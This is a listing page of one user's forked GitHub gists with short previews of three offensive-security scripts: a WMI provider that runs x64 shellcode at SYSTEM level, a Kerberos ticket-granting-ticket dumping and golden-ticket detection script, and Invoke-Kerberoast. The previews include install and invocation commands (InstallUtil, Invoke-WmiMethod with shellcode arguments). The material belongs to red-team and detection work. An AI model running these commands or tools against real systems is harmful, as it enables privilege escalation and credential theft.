Tim McGuffin NotMedic
NotMedic
/ EvilWMIProvider.cs
Created
May 18, 2020 14:35
— forked from TheWover/EvilWMIProvider.cs
Evil WMI Provider
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Based On LocalAdmin WMI Provider by Roger Zander | |
| // http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx | |
| // Adapted For Evil By @subTee | |
| // Executes x64 ShellCode | |
| // | |
| // Deliver and Install dll | |
| // C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll | |
| // Invoke calc for SYSTEM level calculations | |
| // Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode | |
| // Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null |
NotMedic
/ Get-KerberosTicketGrantingTicket.ps1
Created
July 2, 2020 15:34
— forked from jaredcatkinson/Get-KerberosTicketGrantingTicket.ps1
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-KerberosTicketGrantingTicket | |
| { | |
| <# | |
| .SYNOPSIS | |
| Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
| .DESCRIPTION | |
| Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
NotMedic
/ Invoke-Kerberoast.ps1
Created
May 6, 2021 21:12
— forked from jaredhaight/Invoke-Kerberoast.ps1
Get Kerberoastable SPNs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Invoke-Kerberoast.ps1 | |
| Author: Will Schroeder (@harmj0y), @machosec | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast). | |
| Note: the primary method of use will be Invoke-Kerberoast with various targeting options. |
OlderNewer